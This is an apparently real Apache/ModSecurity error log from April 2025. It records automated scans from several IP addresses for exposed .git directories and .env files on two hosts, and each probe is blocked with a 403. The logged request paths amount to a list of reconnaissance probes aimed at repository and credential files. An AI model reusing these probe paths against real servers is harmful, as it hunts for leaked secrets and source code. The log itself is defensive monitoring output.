[Thu Apr 17 01:52:50.501675 2025] [:error] [pid 2528952] [client 45.130.203.173:11845] [client 45.130.203.173] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aABC0klFxqDCymebGwMxcAAAAAE"]
[Thu Apr 17 01:52:50.501958 2025] [:error] [pid 2528952] [client 45.130.203.173:11845] [client 45.130.203.173] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aABC0klFxqDCymebGwMxcAAAAAE"]
[Thu Apr 17 01:52:50.502130 2025] [:error] [pid 2528952] [client 45.130.203.173:11845] [client 45.130.203.173] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aABC0klFxqDCymebGwMxcAAAAAE"]
[Sat Apr 19 01:20:29.496841 2025] [:error] [pid 2574554] [client 45.148.10.80:54498] [client 45.148.10.80] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aALePfLFZjB_yz4fZMqCfAAAAAU"]
[Sat Apr 19 01:20:29.498839 2025] [:error] [pid 2574554] [client 45.148.10.80:54498] [client 45.148.10.80] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aALePfLFZjB_yz4fZMqCfAAAAAU"]
[Sat Apr 19 01:20:29.499000 2025] [:error] [pid 2574554] [client 45.148.10.80:54498] [client 45.148.10.80] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aALePfLFZjB_yz4fZMqCfAAAAAU"]
[Sun Apr 20 00:37:11.343857 2025] [:error] [pid 2593803] [client 45.130.203.237:15433] [client 45.130.203.237] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aAQll78vO-7DYZ1oj6jBLgAAAA0"]
[Sun Apr 20 00:37:11.344080 2025] [:error] [pid 2593803] [client 45.130.203.237:15433] [client 45.130.203.237] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aAQll78vO-7DYZ1oj6jBLgAAAA0"]
[Sun Apr 20 00:37:11.344240 2025] [:error] [pid 2593803] [client 45.130.203.237:15433] [client 45.130.203.237] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aAQll78vO-7DYZ1oj6jBLgAAAA0"]
[Sun Apr 20 00:37:11.452391 2025] [:error] [pid 2593800] [client 45.130.203.183:40155] [client 45.130.203.183] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aAQll7skDv1Q70N0f4XDogAAAAI"]
[Sun Apr 20 00:37:11.452616 2025] [:error] [pid 2593800] [client 45.130.203.183:40155] [client 45.130.203.183] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aAQll7skDv1Q70N0f4XDogAAAAI"]
[Sun Apr 20 00:37:11.452783 2025] [:error] [pid 2593800] [client 45.130.203.183:40155] [client 45.130.203.183] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aAQll7skDv1Q70N0f4XDogAAAAI"]
[Sun Apr 20 18:22:33.674112 2025] [:error] [pid 2597529] [client 179.43.188.122:43950] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /admin/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/admin/.git/config"] [unique_id "aAUfSQZGKWoSh0bB6I5KiAAAAAA"]
[Sun Apr 20 18:22:33.674480 2025] [:error] [pid 2597529] [client 179.43.188.122:43950] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/admin/.git/config"] [unique_id "aAUfSQZGKWoSh0bB6I5KiAAAAAA"]
[Sun Apr 20 18:22:33.674649 2025] [:error] [pid 2597529] [client 179.43.188.122:43950] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/admin/.git/config"] [unique_id "aAUfSQZGKWoSh0bB6I5KiAAAAAA"]
[Sun Apr 20 18:22:33.679215 2025] [authz_core:error] [pid 2598999] [client 179.43.188.122:43958] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.git
[Sun Apr 20 18:22:33.689269 2025] [authz_core:error] [pid 2598998] [client 179.43.188.122:43970] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.git
[Sun Apr 20 18:22:33.700239 2025] [:error] [pid 2598997] [client 179.43.188.122:43980] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /public/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/public/.git/config"] [unique_id "aAUfSZxo1fL5GOjHvW-iDgAAAAk"]
[Sun Apr 20 18:22:33.700573 2025] [:error] [pid 2598997] [client 179.43.188.122:43980] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/public/.git/config"] [unique_id "aAUfSZxo1fL5GOjHvW-iDgAAAAk"]
[Sun Apr 20 18:22:33.700725 2025] [:error] [pid 2598997] [client 179.43.188.122:43980] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/public/.git/config"] [unique_id "aAUfSZxo1fL5GOjHvW-iDgAAAAk"]
[Sun Apr 20 18:22:33.702117 2025] [:error] [pid 2599010] [client 179.43.188.122:43992] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/static../.git/config"] [unique_id "aAUfSXNuewUkVloE_4FcuQAAAA0"]
[Sun Apr 20 18:22:33.702329 2025] [:error] [pid 2599010] [client 179.43.188.122:43992] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/static../.git/config"] [unique_id "aAUfSXNuewUkVloE_4FcuQAAAA0"]
[Sun Apr 20 18:22:33.702474 2025] [:error] [pid 2599010] [client 179.43.188.122:43992] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/static../.git/config"] [unique_id "aAUfSXNuewUkVloE_4FcuQAAAA0"]
[Sun Apr 20 18:22:33.704602 2025] [:error] [pid 2598990] [client 179.43.188.122:43996] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/media../.git/config"] [unique_id "aAUfSZopp4YK0qAensjBsgAAAAg"]
[Sun Apr 20 18:22:33.704788 2025] [:error] [pid 2598990] [client 179.43.188.122:43996] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/media../.git/config"] [unique_id "aAUfSZopp4YK0qAensjBsgAAAAg"]
[Sun Apr 20 18:22:33.704937 2025] [:error] [pid 2598990] [client 179.43.188.122:43996] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/media../.git/config"] [unique_id "aAUfSZopp4YK0qAensjBsgAAAAg"]
[Sun Apr 20 18:22:33.712087 2025] [:error] [pid 2597531] [client 179.43.188.122:43998] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /panel/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/panel/.git/config"] [unique_id "aAUfSSvq4uit1rpTjEgSHAAAAAI"]
[Sun Apr 20 18:22:33.712258 2025] [:error] [pid 2597531] [client 179.43.188.122:43998] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/panel/.git/config"] [unique_id "aAUfSSvq4uit1rpTjEgSHAAAAAI"]
[Sun Apr 20 18:22:33.712422 2025] [:error] [pid 2597531] [client 179.43.188.122:43998] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/panel/.git/config"] [unique_id "aAUfSSvq4uit1rpTjEgSHAAAAAI"]
[Sun Apr 20 18:22:33.714817 2025] [:error] [pid 2599013] [client 179.43.188.122:44010] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /test/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/test/.git/config"] [unique_id "aAUfScJN6RtskYJNqtKL-QAAAA8"]
[Sun Apr 20 18:22:33.714984 2025] [:error] [pid 2599013] [client 179.43.188.122:44010] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/test/.git/config"] [unique_id "aAUfScJN6RtskYJNqtKL-QAAAA8"]
[Sun Apr 20 18:22:33.715138 2025] [:error] [pid 2599013] [client 179.43.188.122:44010] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/test/.git/config"] [unique_id "aAUfScJN6RtskYJNqtKL-QAAAA8"]
[Sun Apr 20 18:22:33.721912 2025] [:error] [pid 2599000] [client 179.43.188.122:44018] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /wp-content/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/wp-content/.git/config"] [unique_id "aAUfSS74hH9DYn7JWeMqhQAAAAw"]
[Sun Apr 20 18:22:33.722091 2025] [:error] [pid 2599000] [client 179.43.188.122:44018] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/wp-content/.git/config"] [unique_id "aAUfSS74hH9DYn7JWeMqhQAAAAw"]
[Sun Apr 20 18:22:33.722384 2025] [:error] [pid 2599000] [client 179.43.188.122:44018] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/wp-content/.git/config"] [unique_id "aAUfSS74hH9DYn7JWeMqhQAAAAw"]
[Sun Apr 20 18:22:33.725925 2025] [:error] [pid 2599012] [client 179.43.188.122:44020] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /frontend/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/frontend/.git/config"] [unique_id "aAUfSbkRSM_wWuOY-YzxcgAAAA4"]
[Sun Apr 20 18:22:33.726139 2025] [:error] [pid 2599012] [client 179.43.188.122:44020] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/frontend/.git/config"] [unique_id "aAUfSbkRSM_wWuOY-YzxcgAAAA4"]
[Sun Apr 20 18:22:33.726298 2025] [:error] [pid 2599012] [client 179.43.188.122:44020] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/frontend/.git/config"] [unique_id "aAUfSbkRSM_wWuOY-YzxcgAAAA4"]
[Sun Apr 20 18:22:33.727525 2025] [:error] [pid 2597529] [client 179.43.188.122:44034] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /docs/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/docs/.git/config"] [unique_id "aAUfSQZGKWoSh0bB6I5KiQAAAAA"]
[Sun Apr 20 18:22:33.727699 2025] [:error] [pid 2597529] [client 179.43.188.122:44034] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/docs/.git/config"] [unique_id "aAUfSQZGKWoSh0bB6I5KiQAAAAA"]
[Sun Apr 20 18:22:33.727851 2025] [:error] [pid 2597529] [client 179.43.188.122:44034] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/docs/.git/config"] [unique_id "aAUfSQZGKWoSh0bB6I5KiQAAAAA"]
[Sun Apr 20 18:22:33.731719 2025] [:error] [pid 2598999] [client 179.43.188.122:44048] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /backend/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/backend/.git/config"] [unique_id "aAUfSTBDed00_-uEOh9oPwAAAAs"]
